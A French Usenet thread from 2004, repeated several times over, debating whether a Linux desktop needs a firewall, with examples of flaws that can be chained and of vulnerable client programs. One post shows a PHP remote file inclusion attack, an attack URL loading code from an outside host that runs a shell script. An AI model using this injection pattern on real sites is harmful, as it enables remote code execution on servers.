Certains linuxiens que je connais me disent que ça ne sert à rien
d'utiliser un pare-feu lorsqu'on a Linux comme OS.
D'autres me disent que c'est une folie que de ne pas en installer un,
car le fait qu'on ait pas trouvé encore, en 30 ans, de virus linuxien ne
signifie pas que quelqu'un n'en trouvera pas un jour.
Comptant passer sous linux cet été, j'aimerais savoir si je dois ou non
prévoir un pare-feu ? Lequel prendre ? Sont-ils aussi bien que le pare
feu ionclus dans Windows XP.
Tiens il y a des failles locales distantes ? Il faudra me mettre au courant de ses subtilités car j'avoue ne jamais en avoir entendu parler...
Remote acces -> local root....
C'est ce qui est par exemple arrive aux serveurs de Savanah, si ma memoire est bonne: une premiere faille a permis aux attaquants d'avoir un compte utilisateur sur le serveur, une seconde leur a permis, a partir de ce compte utilisateur (exploite a distance), de passer root.
Cordialement, Wald Sébastien.
PS : en plus, de la question qui reste posée, de savoir s'il y a une danger réel de fonctionner avec un linux client sans firewall...
Bah rien qu'avec un serveur X qui tourne, la reponse reste "on ne peut pas formellement garantir qu'il n'y aura jamais de danger, donc il y a bien un danger potentiel".
A +
VANHU.
Wald Sebastien <sebastw@free.fr> writes:
Tiens il y a des failles locales distantes ? Il faudra me mettre au
courant de ses subtilités car j'avoue ne jamais en avoir entendu
parler...
Remote acces -> local root....
C'est ce qui est par exemple arrive aux serveurs de Savanah, si ma
memoire est bonne: une premiere faille a permis aux attaquants d'avoir
un compte utilisateur sur le serveur, une seconde leur a permis, a
partir de ce compte utilisateur (exploite a distance), de passer root.
Cordialement, Wald Sébastien.
PS : en plus, de la question qui reste posée, de savoir s'il y a une
danger réel de fonctionner avec un linux client sans firewall...
Bah rien qu'avec un serveur X qui tourne, la reponse reste "on ne peut
pas formellement garantir qu'il n'y aura jamais de danger, donc il y a
bien un danger potentiel".
Tiens il y a des failles locales distantes ? Il faudra me mettre au courant de ses subtilités car j'avoue ne jamais en avoir entendu parler...
Remote acces -> local root....
C'est ce qui est par exemple arrive aux serveurs de Savanah, si ma memoire est bonne: une premiere faille a permis aux attaquants d'avoir un compte utilisateur sur le serveur, une seconde leur a permis, a partir de ce compte utilisateur (exploite a distance), de passer root.
Cordialement, Wald Sébastien.
PS : en plus, de la question qui reste posée, de savoir s'il y a une danger réel de fonctionner avec un linux client sans firewall...
Bah rien qu'avec un serveur X qui tourne, la reponse reste "on ne peut pas formellement garantir qu'il n'y aura jamais de danger, donc il y a bien un danger potentiel".
A +
VANHU.
Eric Masson
"Wald" == Wald Sebastien writes:
Wald> Tiens il y a des failles locales distantes ? Il faudra me mettre Wald> au courant de ses subtilités car j'avoue ne jamais en avoir Wald> entendu parler...
Faut comprendre ce que tu lis, c'est tout.
A partir du moment ou il existe une faille locale (procfs, setuid codé avec les pieds) elle sera exploitable à partir du moment ou l'on dispose d'un shell sur la dite bécane, que l'on soit assis devant ou non n'y change rien.
Wald> PS : en plus, de la question qui reste posée, de savoir s'il y a Wald> une danger réel de fonctionner avec un linux client sans Wald> firewall...
Dépend d'un nombre de choses incalculables (serveurs réseaux divers et variés installés sur une bécane pour l'interconnexion avec d'autres équipements, niveau du pseudo admin de la bécane dont les certitudes peuvent parfois faire rire), cependant une règle reste, le système parfait en termes de sécurité n'existe pas, alors, il est préférable de blinder la conf, histoire de ne pas faciliter le taf du kiddy de base.
Eric Masson
--
Subject: cherche derniers version de linux pour testé faire ofre echange possible mais je n ai que des softs pour win -+- furtif in Guide du linuxien pervers - "Rencontres du 3ème type..." -+-
Wald> Tiens il y a des failles locales distantes ? Il faudra me mettre
Wald> au courant de ses subtilités car j'avoue ne jamais en avoir
Wald> entendu parler...
Faut comprendre ce que tu lis, c'est tout.
A partir du moment ou il existe une faille locale (procfs, setuid codé
avec les pieds) elle sera exploitable à partir du moment ou l'on dispose
d'un shell sur la dite bécane, que l'on soit assis devant ou non n'y
change rien.
Wald> PS : en plus, de la question qui reste posée, de savoir s'il y a
Wald> une danger réel de fonctionner avec un linux client sans
Wald> firewall...
Dépend d'un nombre de choses incalculables (serveurs réseaux divers et
variés installés sur une bécane pour l'interconnexion avec d'autres
équipements, niveau du pseudo admin de la bécane dont les certitudes
peuvent parfois faire rire), cependant une règle reste, le système
parfait en termes de sécurité n'existe pas, alors, il est préférable de
blinder la conf, histoire de ne pas faciliter le taf du kiddy de base.
Eric Masson
--
Subject: cherche derniers version de linux pour testé
faire ofre
echange possible mais je n ai que des softs pour win
-+- furtif in Guide du linuxien pervers - "Rencontres du 3ème type..." -+-
Wald> Tiens il y a des failles locales distantes ? Il faudra me mettre Wald> au courant de ses subtilités car j'avoue ne jamais en avoir Wald> entendu parler...
Faut comprendre ce que tu lis, c'est tout.
A partir du moment ou il existe une faille locale (procfs, setuid codé avec les pieds) elle sera exploitable à partir du moment ou l'on dispose d'un shell sur la dite bécane, que l'on soit assis devant ou non n'y change rien.
Wald> PS : en plus, de la question qui reste posée, de savoir s'il y a Wald> une danger réel de fonctionner avec un linux client sans Wald> firewall...
Dépend d'un nombre de choses incalculables (serveurs réseaux divers et variés installés sur une bécane pour l'interconnexion avec d'autres équipements, niveau du pseudo admin de la bécane dont les certitudes peuvent parfois faire rire), cependant une règle reste, le système parfait en termes de sécurité n'existe pas, alors, il est préférable de blinder la conf, histoire de ne pas faciliter le taf du kiddy de base.
Eric Masson
--
Subject: cherche derniers version de linux pour testé faire ofre echange possible mais je n ai que des softs pour win -+- furtif in Guide du linuxien pervers - "Rencontres du 3ème type..." -+-
Xavier Roche
Wald Sebastien wrote:
Tiens il y a des failles locales distantes ?
Il ne faut pas oublier "l'escalade" : une faille locale peut être exploitée à distance, via une autre faille mineure (distante). Prises séparément, chaque faille est mineure. Mais en les chaînant, on peut arriver à des failles critiques.
Exemple classique: le script php buggé qui fait un <?php @require $page.".html"; ?> avec comme adresse classique http://www.example.com/menu.php?page=2. Sauf que hop, http://www.example.com/menu.php?page=http://www.foo.com/code.php?dummy= avec dans dummy.php un system("sh -c /tmp/foo.sh") exploitant la faille locale, et c'est parti.
Mais, en général, c'est possible sur des machines serveur (ici, avec un Apache et PHP-cgi), pas tellement sur du client, contrairement aux machines Windows qui, en standard sous 2000/XP, étaient jusqu'à récemment "rootables" dès connexion à Internet (merci :135).
PS : en plus, de la question qui reste posée, de savoir s'il y a une danger réel de fonctionner avec un linux client sans firewall...
Je n'ai pas connaissance d'une faille qui ait existé sur des postes clients Linux (sauf peut être il y a 3 ans, avec la faille sur sshd - en supposant que les postes clients aient sshd ouverts par défaut à l'exterieur) - en général ce sont des services serveur.
Wald Sebastien wrote:
Tiens il y a des failles locales distantes ?
Il ne faut pas oublier "l'escalade" : une faille locale peut être
exploitée à distance, via une autre faille mineure (distante). Prises
séparément, chaque faille est mineure. Mais en les chaînant, on peut
arriver à des failles critiques.
Exemple classique: le script php buggé qui fait un
<?php @require $page.".html"; ?>
avec comme adresse classique http://www.example.com/menu.php?page=2.
Sauf que hop,
http://www.example.com/menu.php?page=http://www.foo.com/code.php?dummy=
avec dans dummy.php un system("sh -c /tmp/foo.sh") exploitant la faille
locale, et c'est parti.
Mais, en général, c'est possible sur des machines serveur (ici, avec un
Apache et PHP-cgi), pas tellement sur du client, contrairement aux
machines Windows qui, en standard sous 2000/XP, étaient jusqu'à
récemment "rootables" dès connexion à Internet (merci :135).
PS : en plus, de la question qui reste posée, de savoir s'il y a une
danger réel de fonctionner avec un linux client sans firewall...
Je n'ai pas connaissance d'une faille qui ait existé sur des postes
clients Linux (sauf peut être il y a 3 ans, avec la faille sur sshd - en
supposant que les postes clients aient sshd ouverts par défaut à
l'exterieur) - en général ce sont des services serveur.
Il ne faut pas oublier "l'escalade" : une faille locale peut être exploitée à distance, via une autre faille mineure (distante). Prises séparément, chaque faille est mineure. Mais en les chaînant, on peut arriver à des failles critiques.
Exemple classique: le script php buggé qui fait un <?php @require $page.".html"; ?> avec comme adresse classique http://www.example.com/menu.php?page=2. Sauf que hop, http://www.example.com/menu.php?page=http://www.foo.com/code.php?dummy= avec dans dummy.php un system("sh -c /tmp/foo.sh") exploitant la faille locale, et c'est parti.
Mais, en général, c'est possible sur des machines serveur (ici, avec un Apache et PHP-cgi), pas tellement sur du client, contrairement aux machines Windows qui, en standard sous 2000/XP, étaient jusqu'à récemment "rootables" dès connexion à Internet (merci :135).
PS : en plus, de la question qui reste posée, de savoir s'il y a une danger réel de fonctionner avec un linux client sans firewall...
Je n'ai pas connaissance d'une faille qui ait existé sur des postes clients Linux (sauf peut être il y a 3 ans, avec la faille sur sshd - en supposant que les postes clients aient sshd ouverts par défaut à l'exterieur) - en général ce sont des services serveur.
NO_eikaewt_SPAM
Wald Sebastien wrote:
Tiens il y a des failles locales distantes ? Il faudra me mettre au courant de ses subtilités car j'avoue ne jamais en avoir entendu parler...
Bien sur. Tenez, il y a quelques temps de ca, le client de messagerie "pine", que j'utilise de temps en temps etait vulnerable a un probleme de debordenent de tampon qui pouvait etre exploite' simplement via la reception d'un email judicieusement formate'.
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes souvenirs sont bons, via la lecture un mp3 malveillant.
http://www.securityfocus.com/advisories/5632
-- Tweakie
-- Posté via http://www.webatou.net/ Usenet dans votre navigateur ! Complaints-To:
Wald Sebastien wrote:
Tiens il y a des failles locales distantes ? Il faudra me mettre au
courant de ses subtilités car j'avoue ne jamais en avoir entendu parler...
Bien sur. Tenez, il y a quelques temps de ca, le client de messagerie
"pine", que j'utilise de temps en temps etait vulnerable a un probleme
de debordenent de tampon qui pouvait etre exploite' simplement via
la reception d'un email judicieusement formate'.
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable
a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes
souvenirs sont bons, via la lecture un mp3 malveillant.
http://www.securityfocus.com/advisories/5632
--
Tweakie
--
Posté via http://www.webatou.net/
Usenet dans votre navigateur !
Complaints-To: abuse@webatou.net
Tiens il y a des failles locales distantes ? Il faudra me mettre au courant de ses subtilités car j'avoue ne jamais en avoir entendu parler...
Bien sur. Tenez, il y a quelques temps de ca, le client de messagerie "pine", que j'utilise de temps en temps etait vulnerable a un probleme de debordenent de tampon qui pouvait etre exploite' simplement via la reception d'un email judicieusement formate'.
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes souvenirs sont bons, via la lecture un mp3 malveillant.
http://www.securityfocus.com/advisories/5632
-- Tweakie
-- Posté via http://www.webatou.net/ Usenet dans votre navigateur ! Complaints-To:
Laurent Bruder
FAb wrote:
Laurent Bruder writes:
De même que certaines distributions bootable sur cd (knoppix par exemple) n'ont pas de mot de passe root par défaut au démarrage, c'est un risque supplémentaire.
Mais c'est très dur de corrompre des binaires sur un cd bootables. Enfin je crois :-D
je pensais plutot au fait que - la knoppix boote, sans mot de passe root - l'utilisateur configure sa connexion internet, et bien spur se connecte (sinon y a aucun intérêt à configurer) - une fois connecté, quelqu'un arrive à rentrer sur la machine (ok ok, ça dépendra de la durée de connexion, mais quelques minutes bien placée suffisent), et passe en root - de là il ne peut effectivement pas écrire sur le cd de la knoppix (en supposant qu'il ne soit pas rw), mais a accès au disque dur de la machine (suffit de monter /dev/hda1 /dev/sda2 etc....) et peut corrompre/voler des données. De même il peut ouvrir des services à l'insu de l'utilisateur.
FAb wrote:
Laurent Bruder <linux@gnouland.org> writes:
De même que certaines distributions bootable sur cd (knoppix par exemple) n'ont
pas de mot de passe root par défaut au démarrage, c'est un risque supplémentaire.
Mais c'est très dur de corrompre des binaires sur un cd bootables.
Enfin je crois :-D
je pensais plutot au fait que
- la knoppix boote, sans mot de passe root
- l'utilisateur configure sa connexion internet, et bien spur se
connecte (sinon y a aucun intérêt à configurer)
- une fois connecté, quelqu'un arrive à rentrer sur la machine (ok ok,
ça dépendra de la durée de connexion, mais quelques minutes bien placée
suffisent), et passe en root
- de là il ne peut effectivement pas écrire sur le cd de la knoppix (en
supposant qu'il ne soit pas rw), mais a accès au disque dur de la
machine (suffit de monter /dev/hda1 /dev/sda2 etc....) et peut
corrompre/voler des données. De même il peut ouvrir des services à
l'insu de l'utilisateur.
De même que certaines distributions bootable sur cd (knoppix par exemple) n'ont pas de mot de passe root par défaut au démarrage, c'est un risque supplémentaire.
Mais c'est très dur de corrompre des binaires sur un cd bootables. Enfin je crois :-D
je pensais plutot au fait que - la knoppix boote, sans mot de passe root - l'utilisateur configure sa connexion internet, et bien spur se connecte (sinon y a aucun intérêt à configurer) - une fois connecté, quelqu'un arrive à rentrer sur la machine (ok ok, ça dépendra de la durée de connexion, mais quelques minutes bien placée suffisent), et passe en root - de là il ne peut effectivement pas écrire sur le cd de la knoppix (en supposant qu'il ne soit pas rw), mais a accès au disque dur de la machine (suffit de monter /dev/hda1 /dev/sda2 etc....) et peut corrompre/voler des données. De même il peut ouvrir des services à l'insu de l'utilisateur.
Nicob
On Wed, 04 Aug 2004 14:55:04 +0000, Tweakie wrote:
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes souvenirs sont bons, via la lecture un mp3 malveillant.
On Wed, 04 Aug 2004 14:55:04 +0000, Tweakie wrote:
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable
a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes
souvenirs sont bons, via la lecture un mp3 malveillant.
On Wed, 04 Aug 2004 14:55:04 +0000, Tweakie wrote:
Autre exemple, le lecteur de mp3 mpg123 a lui aussi ete vulnerable a un (plusieurs ?) probleme similaire pouvant etre exploite', si mes souvenirs sont bons, via la lecture un mp3 malveillant.
C'est marrant, l'actualité vient de nous donnner ces derniers jours quelques exemples "real life" de zolis bugs côté client : Opera, Mozilla, libpng, PuTTY, ...
Nicob
On Thu, 05 Aug 2004 17:36:00 +0000, Nicob wrote:
Pareil pour Mplayer, le lecteur de films ...
C'est marrant, l'actualité vient de nous donnner ces derniers jours
quelques exemples "real life" de zolis bugs côté client : Opera,
Mozilla, libpng, PuTTY, ...
C'est marrant, l'actualité vient de nous donnner ces derniers jours quelques exemples "real life" de zolis bugs côté client : Opera, Mozilla, libpng, PuTTY, ...
Nicob
Wald Sebastien
Ok, donc Linux configuré en client est invulnérable aux attaques internet (pour le moment ?). Seuls des logiciels mal conçus externes peuvent trahir le système s'ils ne sont pas mis à jour...
Merci. Me voilà donc rassuré.
Cordialement, Wald Sébastien.
Ok, donc Linux configuré en client est invulnérable aux attaques
internet (pour le moment ?). Seuls des logiciels mal conçus externes
peuvent trahir le système s'ils ne sont pas mis à jour...
Ok, donc Linux configuré en client est invulnérable aux attaques internet (pour le moment ?). Seuls des logiciels mal conçus externes peuvent trahir le système s'ils ne sont pas mis à jour...
Merci. Me voilà donc rassuré.
Cordialement, Wald Sébastien.
Nicob
On Fri, 06 Aug 2004 08:16:32 +0000, Wald Sebastien wrote:
Ok, donc Linux configuré en client est invulnérable aux attaques internet
Il me semblait justement qu'on venait de montrer le contraire ...
Nicob
On Fri, 06 Aug 2004 08:16:32 +0000, Wald Sebastien wrote:
Ok, donc Linux configuré en client est invulnérable aux attaques
internet
Il me semblait justement qu'on venait de montrer le contraire ...
On Fri, 06 Aug 2004 08:16:32 +0000, Wald Sebastien wrote:
Ok, donc Linux configuré en client est invulnérable aux attaques internet
Il me semblait justement qu'on venait de montrer le contraire ...
Nicob
T0t0
"Wald Sebastien" wrote in message news:4111ffcc$0$29383$
Ok, donc Linux configuré en client est invulnérable aux attaques internet
Mouarf, elle est bien bonne celle-là. T'as un problème de lecteur de news ?
Quant à penser qu'un système est invulnérable, cela va à l'encontre de tous les principes de bon sens compte tenu de l'histoire d'Internet.
Seuls des logiciels mal conçus externes peuvent trahir le système s'ils ne sont pas mis à jour...
Je ne comprends pas bien. Tu veux dire que si tu n'utilises aucun logiciel client tu ne vas pas encourir de risque ? D'une part ce n'est pas vraiment la définition d'un client, qui se veut ergonomique, et d'autre part ce n'est pas obligatoirement vrai tant que ta pile IP est accessible au public.
Merci. Me voilà donc rassuré.
De rien, tu t'es rassuré tout seul apparemment, malgré les nombreuses interventions t'expliquant les risques encourus.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
"Wald Sebastien" <sebastw@free.fr> wrote in message
news:4111ffcc$0$29383$626a14ce@news.free.fr
Ok, donc Linux configuré en client est invulnérable aux attaques
internet
Mouarf, elle est bien bonne celle-là.
T'as un problème de lecteur de news ?
Quant à penser qu'un système est invulnérable, cela va à l'encontre de
tous les principes de bon sens compte tenu de l'histoire d'Internet.
Seuls des logiciels mal conçus externes
peuvent trahir le système s'ils ne sont pas mis à jour...
Je ne comprends pas bien.
Tu veux dire que si tu n'utilises aucun logiciel client tu ne vas
pas encourir de risque ?
D'une part ce n'est pas vraiment la définition d'un client, qui se veut
ergonomique, et d'autre part ce n'est pas obligatoirement vrai tant
que ta pile IP est accessible au public.
Merci. Me voilà donc rassuré.
De rien, tu t'es rassuré tout seul apparemment, malgré les nombreuses
interventions t'expliquant les risques encourus.
--
Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
"Wald Sebastien" wrote in message news:4111ffcc$0$29383$
Ok, donc Linux configuré en client est invulnérable aux attaques internet
Mouarf, elle est bien bonne celle-là. T'as un problème de lecteur de news ?
Quant à penser qu'un système est invulnérable, cela va à l'encontre de tous les principes de bon sens compte tenu de l'histoire d'Internet.
Seuls des logiciels mal conçus externes peuvent trahir le système s'ils ne sont pas mis à jour...
Je ne comprends pas bien. Tu veux dire que si tu n'utilises aucun logiciel client tu ne vas pas encourir de risque ? D'une part ce n'est pas vraiment la définition d'un client, qui se veut ergonomique, et d'autre part ce n'est pas obligatoirement vrai tant que ta pile IP est accessible au public.
Merci. Me voilà donc rassuré.
De rien, tu t'es rassuré tout seul apparemment, malgré les nombreuses interventions t'expliquant les risques encourus.
-- Posted via Mailgate.ORG Server - http://www.Mailgate.ORG
